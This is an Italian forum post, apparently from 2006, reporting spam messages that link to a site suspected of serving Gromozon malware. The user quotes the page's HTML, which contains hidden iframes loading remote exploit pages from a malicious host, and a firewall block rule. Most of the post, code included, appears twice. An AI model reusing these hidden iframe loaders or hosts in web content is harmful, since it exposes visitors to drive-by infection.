*Nexus*
12-10-2006, 20:19
Da un paio di giorni mi arrivano strani pm con il link al sito people1000 (http://[QUESTO NO]people1000.com/?Usu) il sito dopo aver fatto qualche prova dovrebbe contenere lo stesso malware di gromozon visto che solo disabilitando momentaneamente la rule al firewall che avevo creato (block all inbound and outbound tcp connection where remote address 82.255.114.158) il kaspersky rivela il malware sulla pagina, invece con la rule attiva tutto tace.
Il browser usato è firefox 2.0 beta 2, l'html della pagina è:
<html>
<title>under construction</title>
<body>
<iframe src="http://idkqzshcjxr.com/page.php?10512" frameborder=0 width=1 height=1 scrolling=no></iframe>
<center><font size=12><b>under construction </b></font></center>
<table height=100%>
<tr height=100% valign=bottom><td>
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';'+Math.random()+
'" alt="" title="LiveInternet" '+
'border=0 width=31 height=31><\/a>')//--></script><!--/LiveInternet-->
</td></tr>
</table>
</body>
</html>
L'html della pagina dove risiede fisicamente il malware è:
<iframe src="http://idkqzshcjxr.com/6edc9896/10512/9/wmp_nt.htm" width=1 height=1></iframe><iframe src="http://idkqzshcjxr.com/6edc9896/10512/1/firefox.php" width=9 height=9 style=display:none></iframe>
Spero di esser stato utile, volevo saperne qualcosa di più su questa infezione e su come i bot automatici siano riusciti ad infilarsi anche in forum molto famosi. (basta fare una ricerchina il google per trovare molti forum vittima di questo spamming virale: http://www.google.it/search?hl=it&q=people1000.com&btnG=Cerca&meta= )
Grazie :)
Il browser usato è firefox 2.0 beta 2, l'html della pagina è:
<html>
<title>under construction</title>
<body>
<iframe src="http://idkqzshcjxr.com/page.php?10512" frameborder=0 width=1 height=1 scrolling=no></iframe>
<center><font size=12><b>under construction </b></font></center>
<table height=100%>
<tr height=100% valign=bottom><td>
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';'+Math.random()+
'" alt="" title="LiveInternet" '+
'border=0 width=31 height=31><\/a>')//--></script><!--/LiveInternet-->
</td></tr>
</table>
</body>
</html>
L'html della pagina dove risiede fisicamente il malware è:
<iframe src="http://idkqzshcjxr.com/6edc9896/10512/9/wmp_nt.htm" width=1 height=1></iframe><iframe src="http://idkqzshcjxr.com/6edc9896/10512/1/firefox.php" width=9 height=9 style=display:none></iframe>
Spero di esser stato utile, volevo saperne qualcosa di più su questa infezione e su come i bot automatici siano riusciti ad infilarsi anche in forum molto famosi. (basta fare una ricerchina il google per trovare molti forum vittima di questo spamming virale: http://www.google.it/search?hl=it&q=people1000.com&btnG=Cerca&meta= )
Grazie :)